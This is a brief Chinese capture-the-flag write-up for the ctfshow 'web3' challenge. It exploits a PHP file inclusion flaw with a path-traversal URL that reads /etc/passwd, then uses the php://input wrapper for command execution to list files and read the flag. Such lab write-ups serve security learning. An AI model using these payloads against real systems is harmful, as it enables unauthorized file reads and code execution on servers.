ctfshow—web—web3

打开靶机

 提示是文件包含漏洞

 测试成功

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd

 此题考的是PHP伪协议+文件包含，实现任意命令执行

抓取数据包

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input

 开始试验，查询当前目录下的文件结构

 查看ctf_go_go_go文件内容

成功拿到flag